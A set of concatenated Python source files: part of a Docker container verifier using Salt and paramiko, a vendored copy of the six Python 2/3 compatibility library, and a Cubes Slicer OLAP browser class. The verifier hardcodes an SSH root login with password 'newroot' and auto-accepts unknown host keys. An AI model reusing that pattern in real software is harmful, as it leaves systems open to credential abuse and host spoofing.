results = self.salt_client.cmd(app.host_server, 'cmd.run',
['docker start {container_id}'.format(container_id=app.container_id)],
expr_form='list')
self.logger.debug(results)
if results:
if "Error: No such container" in results[app.host_server]:
# We need to recreate the container
self.logger.error("Container is missing on the host!. "
"Trying to recreate")
self.manager.start_application(app)
self.logger.info("Sleeping 2 seconds while the container starts")
time.sleep(2)
self.manager.bootstrap_application(app)
elif "Error: start: No such container:" in results[app.host_server]:
# Seems the container already exists but won't start. Bug?
self.logger.error("Container failed to start")
self.move_application(app)
else:
self.logger.info("Waiting 2 seconds for docker to start the container")
time.sleep(2)
self.check_running_application(app)
else:
# Move the container to another host, this host is messed up
self.logger.error("Failed to start {container_id} on host {host}".format(
container_id=app.container_id, host=app.host_server))
self.move_application(app)
# Move an application to another host and record the change in etcd
def move_application(self, app):
old_host = app.host_server
cluster_list = self.manager.get_docker_cluster()
circular_cluster_list = CircularList(
self.manager.order_cluster_by_load(cluster_list))
if app.host_server in circular_cluster_list:
index = circular_cluster_list.index(app.host_server)
app.host_server = circular_cluster_list[index+1].hostname
else:
# Assign the first one in the list if not found above
app.host_server = circular_cluster_list[0].hostname
self.logger.info("Moving app {app_name} from {old_host} to {new_host}".format(
app_name=app.hostname, old_host=old_host, new_host=app.host_server))
self.logger.info("Bootstrapping the application on the new host")
self.start_application(app)
# Log into the application via ssh and check everything
def check_running_application(self, app):
# TODO
# Use the docker top command to see if cron is running instead of using ssh
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Move this user/pass into a config file
self.logger.info('SSHing into host {hostname}:{port}'.format(
hostname=app.host_server, port=app.ssh_port))
ssh.connect(hostname=app.host_server, port=app.ssh_port,
username='root', password='newroot')
# Is cron running?
# If not run start.sh
stdin, stdout, stderr = ssh.exec_command("pgrep cron")
output = stdout.readlines()
self.logger.debug(output)
if len(output) == 0:
# cron isn't running
self.logger.info("Cron is not running. Starting it back up")
stdin, stdout, stderr = ssh.exec_command("/root/start.sh")
else:
self.logger.info("Cron is running.")
ssh.close()
except SSHException:
self.logger.error("Failed to log into server.")
# TODO should we delete this or ignore it?
#self.delete_container(app.host_server, app.container_id)
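# Hedged usage sketch: how this verifier might be driven from a script. The
# `manager` object and its API (load_formation_from_etcd, start_application,
# bootstrap_application, get_docker_cluster, order_cluster_by_load) are
# assumptions taken from the calls above; supply a real manager in practice.
if __name__ == "__main__":
    import logging
    logging.basicConfig(level=logging.INFO)
    logger = logging.getLogger("verify")
    manager = None  # placeholder; a real formation manager object is required
    if manager is not None:
        VerifyFormations(manager, logger).start_verifying()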
| mit |
firebitsbr/infernal-twin | build/pip/pip/_vendor/six.py | 878 | 29664 | """Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2015 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
import functools
import itertools
import operator
import sys
import types
__author__ = "Benjamin Peterson <[email protected]>"
__version__ = "1.9.0"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result) # Invokes __set__.
try:
# This is a bit ugly, but it avoids running this again by
# removing this descriptor.
delattr(obj.__class__, self.name)
except AttributeError:
pass
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
def __getattr__(self, attr):
_module = self._resolve()
value = getattr(_module, attr)
setattr(self, attr, value)
return value
class _LazyModule(types.ModuleType):
def __init__(self, name):
super(_LazyModule, self).__init__(name)
self.__doc__ = self.__class__.__doc__
def __dir__(self):
attrs = ["__doc__", "__name__"]
attrs += [attr.name for attr in self._moved_attributes]
return attrs
# Subclasses should override this
_moved_attributes = []
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _SixMetaPathImporter(object):
"""
A meta path importer to import six.moves and its submodules.
This class implements a PEP302 finder and loader. It should be compatible
with Python 2.5 and all existing versions of Python3
"""
def __init__(self, six_module_name):
self.name = six_module_name
self.known_modules = {}
def _add_module(self, mod, *fullnames):
for fullname in fullnames:
self.known_modules[self.name + "." + fullname] = mod
def _get_module(self, fullname):
return self.known_modules[self.name + "." + fullname]
def find_module(self, fullname, path=None):
if fullname in self.known_modules:
return self
return None
def __get_module(self, fullname):
try:
return self.known_modules[fullname]
except KeyError:
raise ImportError("This loader does not know module " + fullname)
def load_module(self, fullname):
try:
# in case of a reload
return sys.modules[fullname]
except KeyError:
pass
mod = self.__get_module(fullname)
if isinstance(mod, MovedModule):
mod = mod._resolve()
else:
mod.__loader__ = self
sys.modules[fullname] = mod
return mod
def is_package(self, fullname):
"""
Return true, if the named module is a package.
We need this method to get correct spec objects with
Python 3.4 (see PEP451)
"""
return hasattr(self.__get_module(fullname), "__path__")
def get_code(self, fullname):
"""Return None
Required, if is_package is implemented"""
self.__get_module(fullname) # eventually raises ImportError
return None
get_source = get_code # same as get_code
_importer = _SixMetaPathImporter(__name__)
class _MovedItems(_LazyModule):
"""Lazy loading of moved objects"""
__path__ = [] # mark as package
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("intern", "__builtin__", "sys"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("shlex_quote", "pipes", "shlex", "quote"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("UserDict", "UserDict", "collections"),
MovedAttribute("UserList", "UserList", "collections"),
MovedAttribute("UserString", "UserString", "collections"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("dbm_gnu", "gdbm", "dbm.gnu"),
MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("_thread", "thread", "_thread"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"),
MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
if isinstance(attr, MovedModule):
_importer._add_module(attr, "moves." + attr.name)
del attr
_MovedItems._moved_attributes = _moved_attributes
moves = _MovedItems(__name__ + ".moves")
_importer._add_module(moves, "moves")
class Module_six_moves_urllib_parse(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_parse"""
_urllib_parse_moved_attributes = [
MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
MovedAttribute("SplitResult", "urlparse", "urllib.parse"),
MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
MovedAttribute("urljoin", "urlparse", "urllib.parse"),
MovedAttribute("urlparse", "urlparse", "urllib.parse"),
MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
MovedAttribute("quote", "urllib", "urllib.parse"),
MovedAttribute("quote_plus", "urllib", "urllib.parse"),
MovedAttribute("unquote", "urllib", "urllib.parse"),
MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
MovedAttribute("urlencode", "urllib", "urllib.parse"),
MovedAttribute("splitquery", "urllib", "urllib.parse"),
MovedAttribute("splittag", "urllib", "urllib.parse"),
MovedAttribute("splituser", "urllib", "urllib.parse"),
MovedAttribute("uses_fragment", "urlparse", "urllib.parse"),
MovedAttribute("uses_netloc", "urlparse", "urllib.parse"),
MovedAttribute("uses_params", "urlparse", "urllib.parse"),
MovedAttribute("uses_query", "urlparse", "urllib.parse"),
MovedAttribute("uses_relative", "urlparse", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr
Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes
_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"),
"moves.urllib_parse", "moves.urllib.parse")
class Module_six_moves_urllib_error(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_error"""
_urllib_error_moved_attributes = [
MovedAttribute("URLError", "urllib2", "urllib.error"),
MovedAttribute("HTTPError", "urllib2", "urllib.error"),
MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr
Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes
_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"),
"moves.urllib_error", "moves.urllib.error")
class Module_six_moves_urllib_request(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_request"""
_urllib_request_moved_attributes = [
MovedAttribute("urlopen", "urllib2", "urllib.request"),
MovedAttribute("install_opener", "urllib2", "urllib.request"),
MovedAttribute("build_opener", "urllib2", "urllib.request"),
MovedAttribute("pathname2url", "urllib", "urllib.request"),
MovedAttribute("url2pathname", "urllib", "urllib.request"),
MovedAttribute("getproxies", "urllib", "urllib.request"),
MovedAttribute("Request", "urllib2", "urllib.request"),
MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
MovedAttribute("FileHandler", "urllib2", "urllib.request"),
MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
MovedAttribute("urlretrieve", "urllib", "urllib.request"),
MovedAttribute("urlcleanup", "urllib", "urllib.request"),
MovedAttribute("URLopener", "urllib", "urllib.request"),
MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
MovedAttribute("proxy_bypass", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr
Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes
_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"),
"moves.urllib_request", "moves.urllib.request")
class Module_six_moves_urllib_response(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_response"""
_urllib_response_moved_attributes = [
MovedAttribute("addbase", "urllib", "urllib.response"),
MovedAttribute("addclosehook", "urllib", "urllib.response"),
MovedAttribute("addinfo", "urllib", "urllib.response"),
MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr
Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes
_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"),
"moves.urllib_response", "moves.urllib.response")
class Module_six_moves_urllib_robotparser(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_robotparser"""
_urllib_robotparser_moved_attributes = [
MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes
_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"),
"moves.urllib_robotparser", "moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
"""Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
__path__ = [] # mark as package
parse = _importer._get_module("moves.urllib_parse")
error = _importer._get_module("moves.urllib_error")
request = _importer._get_module("moves.urllib_request")
response = _importer._get_module("moves.urllib_response")
robotparser = _importer._get_module("moves.urllib_robotparser")
def __dir__(self):
return ['parse', 'error', 'request', 'response', 'robotparser']
_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"),
"moves.urllib")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_closure = "__closure__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_func_globals = "__globals__"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_closure = "func_closure"
_func_code = "func_code"
_func_defaults = "func_defaults"
_func_globals = "func_globals"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
def get_unbound_function(unbound):
return unbound
create_bound_method = types.MethodType
Iterator = object
else:
def get_unbound_function(unbound):
return unbound.im_func
def create_bound_method(func, obj):
return types.MethodType(func, obj, obj.__class__)
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
if PY3:
def iterkeys(d, **kw):
return iter(d.keys(**kw))
def itervalues(d, **kw):
return iter(d.values(**kw))
def iteritems(d, **kw):
return iter(d.items(**kw))
def iterlists(d, **kw):
return iter(d.lists(**kw))
viewkeys = operator.methodcaller("keys")
viewvalues = operator.methodcaller("values")
viewitems = operator.methodcaller("items")
else:
def iterkeys(d, **kw):
return iter(d.iterkeys(**kw))
def itervalues(d, **kw):
return iter(d.itervalues(**kw))
def iteritems(d, **kw):
return iter(d.iteritems(**kw))
def iterlists(d, **kw):
return iter(d.iterlists(**kw))
viewkeys = operator.methodcaller("viewkeys")
viewvalues = operator.methodcaller("viewvalues")
viewitems = operator.methodcaller("viewitems")
_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.")
_add_doc(itervalues, "Return an iterator over the values of a dictionary.")
_add_doc(iteritems,
"Return an iterator over the (key, value) pairs of a dictionary.")
_add_doc(iterlists,
"Return an iterator over the (key, [values]) pairs of a dictionary.")
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
unichr = chr
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
byte2int = operator.itemgetter(0)
indexbytes = operator.getitem
iterbytes = iter
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
_assertCountEqual = "assertCountEqual"
_assertRaisesRegex = "assertRaisesRegex"
_assertRegex = "assertRegex"
else:
def b(s):
return s
# Workaround for standalone backslash
def u(s):
return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape")
unichr = unichr
int2byte = chr
def byte2int(bs):
return ord(bs[0])
def indexbytes(buf, i):
return ord(buf[i])
iterbytes = functools.partial(itertools.imap, ord)
import StringIO
StringIO = BytesIO = StringIO.StringIO
_assertCountEqual = "assertItemsEqual"
_assertRaisesRegex = "assertRaisesRegexp"
_assertRegex = "assertRegexpMatches"
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
def assertCountEqual(self, *args, **kwargs):
return getattr(self, _assertCountEqual)(*args, **kwargs)
def assertRaisesRegex(self, *args, **kwargs):
return getattr(self, _assertRaisesRegex)(*args, **kwargs)
def assertRegex(self, *args, **kwargs):
return getattr(self, _assertRegex)(*args, **kwargs)
if PY3:
exec_ = getattr(moves.builtins, "exec")
def reraise(tp, value, tb=None):
if value is None:
value = tp()
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
else:
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
if sys.version_info[:2] == (3, 2):
exec_("""def raise_from(value, from_value):
if from_value is None:
raise value
raise value from from_value
""")
elif sys.version_info[:2] > (3, 2):
exec_("""def raise_from(value, from_value):
raise value from from_value
""")
else:
def raise_from(value, from_value):
raise value
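# Usage sketch for reraise: wrap an exception in a different type while
# preserving the original traceback. Calling this helper raises `exc_type`.
def _example_reraise(exc_type):
    try:
        raise ValueError("original failure")
    except ValueError:
        reraise(exc_type, exc_type("wrapped failure"), sys.exc_info()[2])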
print_ = getattr(moves.builtins, "print", None)
if print_ is None:
def print_(*args, **kwargs):
"""The new-style print function for Python 2.4 and 2.5."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
# If the file has an encoding, encode unicode with it.
if (isinstance(fp, file) and
isinstance(data, unicode) and
fp.encoding is not None):
errors = getattr(fp, "errors", None)
if errors is None:
errors = "strict"
data = data.encode(fp.encoding, errors)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
if sys.version_info[:2] < (3, 3):
_print = print_
def print_(*args, **kwargs):
fp = kwargs.get("file", sys.stdout)
flush = kwargs.pop("flush", False)
_print(*args, **kwargs)
if flush and fp is not None:
fp.flush()
_add_doc(reraise, """Reraise an exception.""")
if sys.version_info[0:2] < (3, 4):
def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
def wrapper(f):
f = functools.wraps(wrapped, assigned, updated)(f)
f.__wrapped__ = wrapped
return f
return wrapper
else:
wraps = functools.wraps
def with_metaclass(meta, *bases):
"""Create a base class with a metaclass."""
# This requires a bit of explanation: the basic idea is to make a dummy
# metaclass for one level of class instantiation that replaces itself with
# the actual metaclass.
class metaclass(meta):
def __new__(cls, name, this_bases, d):
return meta(name, bases, d)
return type.__new__(metaclass, 'temporary_class', (), {})
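# Usage sketch for with_metaclass; the class names are illustrative.
def _example_with_metaclass():
    class Meta(type):
        pass
    class Base(object):
        pass
    class Concrete(with_metaclass(Meta, Base)):
        pass
    return type(Concrete) is Meta  # True on both Python 2 and 3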
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
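# Usage sketch for add_metaclass: the decorator form replaces both the
# Python 2 __metaclass__ attribute and the Python 3 metaclass keyword.
def _example_add_metaclass():
    class Meta(type):
        pass
    @add_metaclass(Meta)
    class Concrete(object):
        pass
    return type(Concrete) is Meta  # True on both Python 2 and 3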
def python_2_unicode_compatible(klass):
"""
A decorator that defines __unicode__ and __str__ methods under Python 2.
Under Python 3 it does nothing.
To support Python 2 and 3 with a single code base, define a __str__ method
returning text and apply this decorator to the class.
"""
if PY2:
if '__str__' not in klass.__dict__:
raise ValueError("@python_2_unicode_compatible cannot be applied "
"to %s because it doesn't define __str__()." %
klass.__name__)
klass.__unicode__ = klass.__str__
klass.__str__ = lambda self: self.__unicode__().encode('utf-8')
return klass
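# Usage sketch: define __str__ returning text and apply the decorator; on
# Python 2 it derives __unicode__ and a byte-returning __str__, on Python 3
# it is a no-op. Illustrative only.
def _example_unicode_compatible():
    @python_2_unicode_compatible
    class Point(object):
        def __init__(self, x, y):
            self.x, self.y = x, y
        def __str__(self):
            return u"(%d, %d)" % (self.x, self.y)
    return str(Point(1, 2))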
# Complete the moves implementation.
# This code is at the end of this module to speed up module loading.
# Turn this module into a package.
__path__ = [] # required for PEP 302 and PEP 451
__package__ = __name__ # see PEP 366 @ReservedAssignment
if globals().get("__spec__") is not None:
__spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable
# Remove other six meta path importers, since they cause problems. This can
# happen if six is removed from sys.modules and then reloaded. (Setuptools does
# this for some reason.)
if sys.meta_path:
for i, importer in enumerate(sys.meta_path):
# Here's some real nastiness: Another "instance" of the six module might
# be floating around. Therefore, we can't use isinstance() to check for
# the six meta path importer, since the other six instance will have
# inserted an importer with a different class.
if (type(importer).__name__ == "_SixMetaPathImporter" and
importer.name == __name__):
del sys.meta_path[i]
break
del i, importer
# Finally, add the importer to the meta path import hook.
sys.meta_path.append(_importer)
| gpl-3.0 |
she11c0de/cubes | cubes/backends/slicer/browser.py | 1 | 4972 | # -*- coding=utf -*-
import urllib2
import json
import logging
import urllib
from ...logging import get_logger
from ...browser import *
class SlicerBrowser(AggregationBrowser):
"""Aggregation browser for Cubes Slicer OLAP server."""
def __init__(self, cube, store, locale=None, **options):
"""Browser for another Slicer server.
"""
super(SlicerBrowser, self).__init__(cube, store, locale)
self.logger = get_logger()
self.cube = cube
self.locale = locale
self.store = store
def features(self):
# Get the original features as provided by the Slicer server.
# They are stored in browser_options in the Slicer model provider's
# cube().
features = dict(self.cube.browser_options.get("features", {}))
# Replace only the actions, as we are not just a simple proxy.
features["actions"] = ["aggregate", "facts", "fact", "cell", "members"]
return features
def provide_aggregate(self, cell, aggregates, drilldown, split, order,
page, page_size, **options):
params = {}
if cell:
params["cut"] = string_from_cuts(cell.cuts)
if drilldown:
params["drilldown"] = ",".join(drilldown.items_as_strings())
if split:
params["split"] = str(split)
if aggregates:
names = [a.name for a in aggregates]
params["aggregates"] = ",".join(names)
if order:
params["order"] = self._order_param(order)
if page is not None:
params["page"] = str(page)
if page_size is not None:
params["page_size"] = str(page_size)
response = self.store.cube_request("aggregate",
self.cube.basename, params)
result = AggregationResult()
result.cells = response.get('cells', [])
if "summary" in response:
result.summary = response.get('summary')
result.levels = response.get('levels', {})
result.labels = response.get('labels', [])
result.cell = cell
result.aggregates = response.get('aggregates', [])
return result
def facts(self, cell=None, fields=None, order=None, page=None,
page_size=None):
cell = cell or Cell(self.cube)
if fields:
attributes = self.cube.get_attributes(fields)
else:
attributes = []
order = self.prepare_order(order, is_aggregate=False)
params = {}
if cell:
params["cut"] = string_from_cuts(cell.cuts)
if order:
params["order"] = self._order_param(order)
if page is not None:
params["page"] = str(page)
if page_size is not None:
params["page_size"] = str(page_size)
if attributes:
params["fields"] = ",".join(str(attr) for attr in attributes)
params["format"] = "json_lines"
response = self.store.cube_request("facts", self.cube.basename, params,
is_lines=True)
return Facts(response, attributes)
def provide_members(self, cell=None, dimension=None, levels=None,
hierarchy=None, attributes=None, page=None,
page_size=None, order=None, **options):
params = {}
if cell:
params["cut"] = string_from_cuts(cell.cuts)
if order:
params["order"] = self._order_param(order)
if levels:
params["level"] = str(levels[-1])
if hierarchy:
params["hierarchy"] = str(hierarchy)
if page is not None:
params["page"] = str(page)
if page_size is not None:
params["page_size"] = str(page_size)
if attributes:
params["fields"] = ",".join(str(attr) for attr in attributes)
params["format"] = "json_lines"
